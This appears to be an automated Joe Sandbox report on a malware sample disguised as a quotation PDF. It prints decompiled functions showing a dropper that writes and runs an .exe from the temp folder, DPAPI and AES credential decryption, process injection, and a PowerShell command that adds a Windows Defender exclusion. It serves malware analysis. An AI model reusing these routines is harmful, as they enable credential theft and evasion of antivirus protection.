				if(E00406F1B(E0040159E(_v8,  &_v28)) != 0) {
					_t9 =  &_v24;
					 *_t9 = _v24 & 0x00000000;
					__eflags =  *_t9;
				} else {
					_v24 = 1;
				}
				_v13 = _v24;
				E00406BE2();
				_t136 = _v13 & 0x000000ff;
				if((_v13 & 0x000000ff) == 0) {
					E00406BFC( &_v12, E0040159E(_v8,  &_v40));
					E00406BE2();
					_t108 = _v8;
					_t64 = E004015BB(_v8);
					__eflags = _t64;
					if(_t64 == 0) {
						E00406FBC(_t133,  &_v12);
						E0041EE12(_t108);
						_pop(_t108);
					}
					goto L9;
				} else {
					GetTempPathW(0x104,  &_v596);
					E00406BFC( &_v12, E00406F64( &_v32,  &_v596));
					E00406BE2();
					_v36 = E00406CDA( &_v12, _t136, E00401546(_v8));
					E00406C53(_v36, _t136, L".exe");
					_t108 = _v8;
					_t97 = E004015BB(_v8);
					_t137 = _t97;
					if(_t97 == 0) {
						E00406FBC(_t133,  &_v12);
						E0041EE12(_t108);
						_pop(_t108);
					}
					L9:
					E00406FBC(_t133,  &_v12);
					E0041F284( &_v76, _t137, _t108, 0);
					if(E0041E9E4( &_v12) != 0) {
						_v20 = E0041F1A8( &_v76, 0x40000000, 1);
					} else {
						_v20 = E0041F204( &_v76, 0x40000000, 1);
					}
					if(_v20 != 0) {
						E0041F124( &_v76, E004015D9(_v8,  &_v52), 2);
						E004066DA();
						E0041F0FF( &_v76);
					}
					if((E004015F6(_v8) & 0x000000ff) != 0) {
						_t75 = E004015BB(_v8);
						_t76 = E004015CA(_v8);
						_t141 = _t75 - _t76;
						if(_t75 == _t76) {
							_v44 = ShellExecuteW(0, L"open", E00406F44( &_v12), 0, 0, 5);
						}
					}
					E0041EDEB( &_v76, _t141);
					return E00406BE2();
				}
			}

0x00405b82
0x00405b85
0x00405b8c
0x00405ba6
0x00405bb1
0x00405bb1
0x00405bb1
0x00405ba8
0x00405ba8
0x00405ba8
0x00405bb8
0x00405bbe
0x00405bc7
0x00405bc9
0x00405c4e
0x00405c56
0x00405c5b
0x00405c5e
0x00405c63
0x00405c65
0x00405c6e
0x00405c73
0x00405c78
0x00405c78
0x00000000
0x00405bcb
0x00405bd7
0x00405bf0
0x00405bf8
0x00405c0e
0x00405c19
0x00405c1e
0x00405c21
0x00405c26
0x00405c28
0x00405c31
0x00405c36
0x00405c3b
0x00405c3b
0x00405c79
0x00405c82
0x00405c8a
0x00405c9b
0x00405cc0
0x00405c9d
0x00405cac
0x00405cac
0x00405cc7
0x00405cdb
0x00405ce3
0x00405ceb
0x00405ceb
0x00405cfd
0x00405d02
0x00405d0c
0x00405d11
0x00405d13
0x00405d31
0x00405d31
0x00405d13
0x00405d37
0x00405d46
0x00405d46

APIs

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

GetTempPathW.KERNEL32(00000104,?), ref: 00405BD7
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00405D2B

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Part of subcall function 0041EE12: SHFileOperationW.SHELL32(00000000), ref: 0041EE51

Strings

open, xrefs: 00405D24
.exe, xrefs: 00405C11

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteFileOperationPathShellTemplstrlen
String ID: .exe$open
API String ID: 1657938029-49952409
Opcode ID: c582cffaaaaecb49a1d41187b477a85d04fed0a7f8c6c9da9fa4dc2e85d3ebbc
Instruction ID: 1be28b2b81ec425a5a1a191d0da0a1d809e3931f06c790315d99a9efb572bfaf
Opcode Fuzzy Hash: c582cffaaaaecb49a1d41187b477a85d04fed0a7f8c6c9da9fa4dc2e85d3ebbc
Instruction Fuzzy Hash: 9F510D71904119AADB14FBA1DD96BEEB778AF44308F10007EE402B61D1EF786B45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEA7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041DEA7() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				signed int _v18;
				char _v300;

				_v300 = 0x11c;
				_v8 = LoadLibraryA("ntdll.dll");
				if(_v8 == 0) {
					L4:
					if((_v18 & 0x000000ff) == 2 || (_v18 & 0x000000ff) == 3) {
						return 1;
					} else {
						return 0;
					}
				}
				_v12 = GetProcAddress(_v8, "RtlGetVersion");
				if(_v12 != 0) {
					_v16 = _v12;
					_v16( &_v300);
					goto L4;
				}
				return 0;
			}

0x0041deb0
0x0041dec5
0x0041decc
0x0041def9
0x0041df00
0x00000000
0x0041df12
0x00000000
0x0041df12
0x0041df00
0x0041dedc
0x0041dee3
0x0041deec
0x0041def6
0x00000000
0x0041def6
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0041DEBF
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0041DED6

Strings

ntdll.dll, xrefs: 0041DEBA
RtlGetVersion, xrefs: 0041DECE

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 454e170ab50bfe79e49e5b7c5336325e450eb080f64341f7f02868acde91e10b
Instruction ID: 2c883b8bb513c6787d0abcab5a9957a3dbb748d3d00535fa34c55bfd752ff308
Opcode Fuzzy Hash: 454e170ab50bfe79e49e5b7c5336325e450eb080f64341f7f02868acde91e10b
Instruction Fuzzy Hash: 6DF068B0E0021CEECF10AFB0D9496DEBBB0AB09305F5044A2E043E2141D7788BD1DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041DF16() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				intOrPtr _v284;
				intOrPtr _v296;
				char _v300;

				_v300 = 0x11c;
				_v8 = LoadLibraryA("ntdll.dll");
				if(_v8 == 0) {
					L4:
					if(_v284 != 2) {
						return 0;
					}
					return _v296;
				}
				_v12 = GetProcAddress(_v8, "RtlGetVersion");
				if(_v12 != 0) {
					_v16 = _v12;
					_v16( &_v300);
					goto L4;
				}
				return 0;
			}

0x0041df1f
0x0041df34
0x0041df3b
0x0041df68
0x0041df6f
0x00000000
0x0041df79
0x00000000
0x0041df71
0x0041df4b
0x0041df52
0x0041df5b
0x0041df65
0x00000000
0x0041df65
0x00000000

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0041DF2E
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0041DF45

Strings

ntdll.dll, xrefs: 0041DF29
RtlGetVersion, xrefs: 0041DF3D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 3e9412440a92cc3f6e3cf7a744b7f7e7c77aefc5572f2fff0a630fb6719d91cb
Instruction ID: 0d17471d1c0373c6f0fa46a197cb2c0694d1adc768bceafeb7a2a7b63d652311
Opcode Fuzzy Hash: 3e9412440a92cc3f6e3cf7a744b7f7e7c77aefc5572f2fff0a630fb6719d91cb
Instruction Fuzzy Hash: 59F0BDB0E0021CEFCF50ABA0D9497DDBBB4AB05315F6044E6D506A2290D7789FD6DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004203E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004203E4(intOrPtr* _a4) {
				_Unknown_base(*)()* _v8;
				signed int _v12;
				intOrPtr _v16;

				_v12 = _v12 & 0x00000000;
				_v8 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_v8 != 0) {
					_v16 = _v8;
					_v16( *_a4,  &_v12);
				}
				return _v12;
			}

0x004203ea
0x00420405
0x0042040c
0x00420411
0x0042041d
0x0042041d
0x00420424

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 004203F8
GetProcAddress.KERNEL32(00000000), ref: 004203FF

Strings

IsWow64Process, xrefs: 004203EE
kernel32, xrefs: 004203F3

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: a582f851edc14b9777c7bab912126ed6f0dab713f689bb358a211f425d49835f
Instruction ID: 090e05f323ffbd277069d981db37368e9dbb17921e26d6c5bb3a6ff88076d9b7
Opcode Fuzzy Hash: a582f851edc14b9777c7bab912126ed6f0dab713f689bb358a211f425d49835f
Instruction Fuzzy Hash: AEE0C975E00208FFCB00EFE4E949BCDBBF8BB08305F5040A5A501A3251D674AA44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0FB Relevance: 6.1, APIs: 4, Instructions: 91
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E0FB(intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				struct HINSTANCE__* _v12;
				struct HRSRC__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;

				_v8 = _v8 & 0x00000000;
				_v12 = LoadLibraryExW(E00406F44(_a4), 0, 2);
				if(_v12 != 0xffffffff) {
					_v16 = FindResourceW(_v12, 1, 0x10);
					if(_v16 != 0) {
						_v8 = LoadResource(_v12, _v16);
						if(_v8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 0x14));
							 *((short*)(_a8 + 4)) =  *(_v8 + 0x18) >> 0x10;
							 *((short*)(_a8 + 6)) =  *(_v8 + 0x18);
							if(( *(_v8 + 0x28) & 0x00000001) == 0) {
								_v20 = _v20 & 0x00000000;
							} else {
								_v20 = 1;
							}
							 *(_a8 + 8) = _v20;
							if(( *(_v8 + 0x28) & 0x00000002) == 0) {
								_v24 = _v24 & 0x00000000;
							} else {
								_v24 = 1;
							}
							 *(_a8 + 0xc) = _v24;
							if(( *(_v8 + 0x28) & 0x00000008) == 0) {
								_v28 = _v28 & 0x00000000;
							} else {
								_v28 = 1;
							}
							 *(_a8 + 0x10) = _v28;
							if(( *(_v8 + 0x28) & 0x00000020) == 0) {
								_v32 = _v32 & 0x00000000;
							} else {
								_v32 = 1;
							}
							 *(_a8 + 0x14) = _v32;
							FreeLibrary(_v12);
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

0x0041e101
0x0041e118
0x0041e11f
0x0041e135
0x0041e13c
0x0041e151
0x0041e158
0x0041e16a
0x0041e178
0x0041e186
0x0041e193
0x0041e19e
0x0041e195
0x0041e195
0x0041e195
0x0041e1a8
0x0041e1b4
0x0041e1bf
0x0041e1b6
0x0041e1b6
0x0041e1b6
0x0041e1c9
0x0041e1d5
0x0041e1e0
0x0041e1d7
0x0041e1d7
0x0041e1d7
0x0041e1ea
0x0041e1f6
0x0041e201
0x0041e1f8
0x0041e1f8
0x0041e1f8
0x0041e20b
0x0041e211
0x00000000
0x0041e219
0x00000000
0x0041e15a
0x00000000
0x0041e13e
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,?,?,0041BB20,?), ref: 0041E112
FindResourceW.KERNEL32(000000FF,00000001,00000010,?,?,?,?,0041BB20), ref: 0041E12F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FindLibraryLoadResource
String ID:
API String ID: 3465301913-0
Opcode ID: 1d98a38046a9a0b623261398c1ee5d4c12edb5de2ea660a06a35114ac5ff5b0f
Instruction ID: 72265bceee5bffbce9deec5891205241166a3ffb2d62892a0c296baa02894699
Opcode Fuzzy Hash: 1d98a38046a9a0b623261398c1ee5d4c12edb5de2ea660a06a35114ac5ff5b0f
Instruction Fuzzy Hash: 2F41F978A14208EFDB04CF95C959BAEB7B0FF08315F10849AE815AB391C3799E81DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00419BFD Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00419BFD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v8;
				signed int _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				void* _t41;

				_v12 = _v12 & 0x00000000;
				if(E0041A064(_t41, _a4,  &_v8,  &_v16) == 0) {
					L9:
					return _v12;
				}
				if(_v16 >= 5) {
					_v24 = E004012DD(_v8, "DPAPI", 5);
					_t49 = _v24;
					if(_v24 == 0) {
						_push(0);
						if(E00419CAA(_t41, _t49, _v8 + 5, _v16 - 5, 0, _a8, _a12, 0, 0,  &_v20,  &_v28) == 0) {
							_t22 =  &_v12;
							 *_t22 = _v12 & 0x00000000;
							__eflags =  *_t22;
						} else {
							if(_v28 == 0x20) {
								_v12 = E0041A0E3(_t41, _v20, _a16, _a20);
							}
							LocalFree(_v20);
						}
					}
				}
				LocalFree(_v8);
				goto L9;
			}

0x00419c03
0x00419c1c
0x00419ca5
0x00419ca9
0x00419ca9
0x00419c26
0x00419c3a
0x00419c3d
0x00419c41
0x00419c43
0x00419c71
0x00419c98
0x00419c98
0x00419c98
0x00419c73
0x00419c77
0x00419c8a
0x00419c8a
0x00419c90
0x00419c90
0x00419c71
0x00419c41
0x00419c9f
0x00000000

APIs

Part of subcall function 0041A064: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A088
Part of subcall function 0041A064: LocalAlloc.KERNEL32(00000040,00419F98,?,?,00419F98,00000000,00000000), ref: 0041A099
Part of subcall function 0041A064: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00419F98,00000000,00000000), ref: 0041A0BF
Part of subcall function 0041A064: LocalFree.KERNEL32(00000000,?,?,00419F98,00000000,00000000), ref: 0041A0D3

LocalFree.KERNEL32(00000000), ref: 00419C90

Part of subcall function 0041A0E3: BCryptOpenAlgorithmProvider.BCRYPT(00000000,AES,00000000,00000000,?,?,?,00419C87,00000000), ref: 0041A104
Part of subcall function 0041A0E3: BCryptSetProperty.BCRYPT(00000000,ChainingMode,ChainingModeGCM,00000020,00000000,?,?,?,00419C87,00000000), ref: 0041A126
Part of subcall function 0041A0E3: BCryptGenerateSymmetricKey.BCRYPT(00000000,00419C87,00000000,00000000,00000000,00000020,00000000,?,?,?,00419C87,00000000), ref: 0041A148

LocalFree.KERNEL32(?,?,?,?,0041A4C0,00000000,00000000), ref: 00419C9F

Strings

, xrefs: 00419C73
DPAPI, xrefs: 00419C2A

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocGenerateOpenPropertyProviderSymmetric
String ID: $DPAPI
API String ID: 100058986-1819349886
Opcode ID: ee847521adc9bea57c52a7da5ecd99b0383300e86e3de1ab841cd6345d5e99e5
Instruction ID: f89f4564452ae7b02d3ef17bb3ad11afe9bd96559e2cf86be57f5d594174da78
Opcode Fuzzy Hash: ee847521adc9bea57c52a7da5ecd99b0383300e86e3de1ab841cd6345d5e99e5
Instruction Fuzzy Hash: AE114972D0020DFBDF10DF90CD46BEE7BB9AB04305F10406AF904B11A0E7359AA49B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D147 Relevance: 6.1, APIs: 4, Instructions: 57
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041D147() {
				intOrPtr _v8;
				intOrPtr _t35;
				intOrPtr _t40;
				intOrPtr _t47;

				_push(_t47);
				_v8 = _t47;
				if( *(_v8 + 0x14) == 0) {
					L7:
					E0041D435(_v8 + 0x10);
					E0041D435(_v8 + 4);
					E0041D435(_v8 + 0xc);
					E0041D435(_v8 + 8);
					_t35 = _v8;
					 *(_t35 + 0x18) =  *(_t35 + 0x18) & 0x00000000;
					return _t35;
				}
				if(GetCurrentThreadId() ==  *((intOrPtr*)(_v8 + 0x18))) {
					L6:
					E0041D435(_v8 + 0x14);
					goto L7;
				}
				_t40 = _v8;
				if( *((intOrPtr*)(_t40 + 0x10)) != 0) {
					SetEvent( *(_v8 + 0x10));
					if(WaitForSingleObject( *(_v8 + 0x14), 0x1388) == 0x102) {
						TerminateThread( *(_v8 + 0x14), 0xfffffffe);
					}
					goto L6;
				}
				return _t40;
			}

0x0041d14a
0x0041d14b
0x0041d155
0x0041d1af
0x0041d1b6
0x0041d1c3
0x0041d1d0
0x0041d1dd
0x0041d1e3
0x0041d1e6
0x00000000
0x0041d1e6
0x0041d163
0x0041d1a2
0x0041d1a9
0x00000000
0x0041d1ae
0x0041d165
0x0041d16c
0x0041d176
0x0041d192
0x0041d19c
0x0041d19c
0x00000000
0x0041d192
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 0041D157
SetEvent.KERNEL32(00000000,?,0041D5EF,005606D4,?,00405EFF,00000000,exit,00000000,start), ref: 0041D176
WaitForSingleObject.KERNEL32(00000000,00001388,?,0041D5EF,005606D4,?,00405EFF,00000000,exit,00000000,start), ref: 0041D187
TerminateThread.KERNEL32(00000000,000000FE,?,0041D5EF,005606D4,?,00405EFF,00000000,exit,00000000,start), ref: 0041D19C

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Thread$CurrentEventObjectSingleTerminateWait
String ID:
API String ID: 2174867186-0
Opcode ID: e89af373844b8969ac12c119ddd7bd8c780f294215506df9ae8b738dcb0a9732
Instruction ID: 801982e37232e3225ab61acccb7fed1ee6e058b268e79701e592ff9f34dc1dcc
Opcode Fuzzy Hash: e89af373844b8969ac12c119ddd7bd8c780f294215506df9ae8b738dcb0a9732
Instruction Fuzzy Hash: 1B11FB71A00104FBDB04DF9CEA49E8D77B5AF04319F614095F005E72A2CB38EE91EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00411782 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00411782(void* __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8, long _a12) {
				void* _v5;
				char _v6;
				char _v7;
				signed int _v12;
				intOrPtr* _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				signed int _t81;
				char* _t88;
				char* _t94;
				void* _t95;
				char* _t98;
				char* _t105;
				void* _t106;
				void* _t111;
				void* _t112;
				void* _t117;
				char* _t119;

				_t119 = __edx;
				_t117 = __ecx;
				if(( *0x42cc8c & 0x000000ff) == 0) {
					if(E00412315() == 0) {
						_v5 = 0;
					} else {
						_v5 = 1;
					}
					 *0x42cc8c = _v5;
				}
				_t129 = _a12;
				if(_a12 == 0) {
					_a12 = E00411543(_t117, _t129);
				}
				_t81 = OpenProcess(0x1fffff, 0, _a12);
				_v12 = _t81;
				if(_v12 != 0) {
					_v28 = 0x100000;
					_v64 = E0041233A(_t117, _t119, _v12, 0, 0, _v28, 0x3000, 0x40);
					_v60 = _t119;
					__eflags = _v64;
					if(_v64 != 0) {
						L12:
						_v40 = _v40 & 0x00000000;
						E004124E2(_t117, _t119, _v12, _v64, _v60, _v28, 0x40,  &_v40);
						_v72 = E0041233A(_t117, _t119, _v12, 0x33370000, 0, 0x100, 0x3000, 0x40);
						_v68 = _t119;
						__eflags = _v72;
						if(_v72 != 0) {
							L15:
							_v32 = _v32 & 0x00000000;
							_v24 = "XXXXXX";
							_v16 = _v24;
							_t88 = _v16 + 1;
							__eflags = _t88;
							_v44 = _t88;
							do {
								_v6 =  *_v16;
								_v16 = _v16 + 1;
								__eflags = _v6;
							} while (_v6 != 0);
							_v48 = _v16 - _v44;
							_t94 = E00412239(_t117, _t119, _v12, _v72, _v68, _v24, _v48,  &_v32);
							__eflags = _t94;
							if(_t94 == 0) {
								L21:
								_t95 = 0xfffffffd;
								return _t95;
							}
							_v20 = _v24;
							_t98 =  &(_v20[1]);
							__eflags = _t98;
							_v52 = _t98;
							do {
								_v7 =  *_v20;
								_v20 =  &(_v20[1]);
								__eflags = _v7;
							} while (_v7 != 0);
							_v56 = _v20 - _v52;
							__eflags = _v32 - _v56;
							if(_v32 == _v56) {
								_v36 = _v36 & 0x00000000;
								_t105 = E00412239(_t117, _t119, _v12, _v64, _v60, _a4, _a8,  &_v36);
								__eflags = _t105;
								if(_t105 == 0) {
									L24:
									_t106 = 0xfffffffd;
									return _t106;
								}
								__eflags = _v36 - _a8;
								if(_v36 == _a8) {
									_v80 = _v64;
									_v76 = _v60;
									asm("cdq");
									return E00412409(_v60, _t119, _v12, _t119, _v80, _v76, 0, 0);
								}
								goto L24;
							}
							goto L21;
						}
						__eflags = _v68;
						if(_v68 != 0) {
							goto L15;
						}
						_t111 = 0xfffffffe;
						return _t111;
					}
					__eflags = _v60;
					if(_v60 != 0) {
						goto L12;
					}
					_t112 = 0xfffffffe;
					return _t112;
				} else {
					return _t81 | 0xffffffff;
				}
			}

0x00411782
0x00411782
0x00411791
0x0041179a
0x004117a2
0x0041179c
0x0041179c
0x0041179c
0x004117a9
0x004117a9
0x004117ae
0x004117b2
0x004117b9
0x004117b9
0x004117c6
0x004117cc
0x004117d3
0x004117dd
0x004117fd
0x00411800
0x00411803
0x00411807
0x00411817
0x00411817
0x0041182d
0x00411853
0x00411856
0x00411859
0x0041185d
0x0041186d
0x0041186d
0x00411871
0x0041187b
0x00411881
0x00411881
0x00411882
0x00411885
0x0041188a
0x0041188d
0x00411890
0x00411890
0x0041189c
0x004118b2
0x004118ba
0x004118bc
0x004118ed
0x004118ef
0x00000000
0x004118ef
0x004118c1
0x004118c7
0x004118c7
0x004118c8
0x004118cb
0x004118d0
0x004118d3
0x004118d6
0x004118d6
0x004118e2
0x004118e8
0x004118eb
0x004118f2
0x00411909
0x00411911
0x00411913
0x0041191d
0x0041191f
0x00000000
0x0041191f
0x00411918
0x0041191b
0x00411928
0x0041192b
0x0041193b
0x00000000
0x00411943
0x00000000
0x0041191b
0x00000000
0x004118eb
0x0041185f
0x00411863
0x00000000
0x00000000
0x00411867
0x00000000
0x00411867
0x00411809
0x0041180d
0x00000000
0x00000000
0x00411811
0x00000000
0x004117d5
0x00000000
0x004117d5

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 004117C6

Part of subcall function 00412315: GetCurrentProcess.KERNEL32(0042CC94,?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745), ref: 0041231D
Part of subcall function 00412315: IsWow64Process.KERNEL32(00000000,?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745), ref: 00412324
Part of subcall function 00412315: GetProcessHeap.KERNEL32(?,00411611,?,?,?,?,?,?,?,?,?,?,?,?,00405745,?), ref: 0041232A

Strings

XXXXXX, xrefs: 00411871
,W@, xrefs: 004118DC, 004118CB, 004117BC, 004118C4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Process$CurrentHeapOpenWow64
String ID: ,W@$XXXXXX
API String ID: 1563638298-567091386
Opcode ID: fb1b6f40f8340c999b034a8d543b5ea0a695da21c72cdad6497a8425e4d197be
Instruction ID: 06dbada76c0b55d69983e593201f8c54dbd434051ce38feb10592064562442f5
Opcode Fuzzy Hash: fb1b6f40f8340c999b034a8d543b5ea0a695da21c72cdad6497a8425e4d197be
Instruction Fuzzy Hash: 31513871D00208AFDF11DFE5CD41BEEBBB1AF08310F24815AF624B62A1D7789A91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423AAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423AAC(void* __eflags) {
				char _v5;
				char _v6;
				CHAR* _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				CHAR* _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _t57;
				intOrPtr* _t72;

				_v28 = "powershell Add-MpPreference -ExclusionPath ";
				_v24 = E00401000(0x100);
				_v12 = E00401000(0x100);
				E0040132F(_v24, 0, 0x100);
				E0040132F(_v12, 0, 0x100);
				GetModuleFileNameA(0, _v24, 0x100);
				_v16 = _v28;
				_v32 = _v16 + 1;
				do {
					_v5 =  *_v16;
					_v16 = _v16 + 1;
				} while (_v5 != 0);
				_v36 = _v16 - _v32;
				E00401309(_v12, _v28, _v36);
				_t57 =  &(_v12[0x2b]);
				_t72 = _v24;
				 *_t57 =  *_t72;
				_t57[2] =  *((intOrPtr*)(_t72 + 2));
				_v20 = _v12;
				_v40 = _v20 + 1;
				do {
					_v6 =  *_v20;
					_v20 = _v20 + 1;
				} while (_v6 != 0);
				_v44 = _v20 - _v40;
				_v12[_v44] = _v24[0xff];
				return WinExec(_v12, 0);
			}

0x00423ab2
0x00423ac4
0x00423ad2
0x00423adf
0x00423af1
0x00423b03
0x00423b0c
0x00423b13
0x00423b16
0x00423b1b
0x00423b1e
0x00423b21
0x00423b2d
0x00423b39
0x00423b44
0x00423b47
0x00423b4d
0x00423b53
0x00423b59
0x00423b60
0x00423b63
0x00423b68
0x00423b6b
0x00423b6e
0x00423b7a
0x00423b92
0x00423ba0

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 00423B03
WinExec.KERNEL32 ref: 00423B99

Strings

powershell Add-MpPreference -ExclusionPath , xrefs: 00423AB2

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateExecFileModuleNameProcess
String ID: powershell Add-MpPreference -ExclusionPath
API String ID: 1183730998-2194938034
Opcode ID: 1d1047e1e63eb065a024be6468f27b2e02c951c587fefd8daa0fc757e96af9b5
Instruction ID: c2b9f80a182e9db21d11c2b29cb226d6c09b7b6da7c8bb91ce135c3f3814aba2
Opcode Fuzzy Hash: 1d1047e1e63eb065a024be6468f27b2e02c951c587fefd8daa0fc757e96af9b5
Instruction Fuzzy Hash: 6A315E74D04249AFDF01DFA8D842BEDBFB0AF09304F1440A9E551B73A2D3755A41CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040583A(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
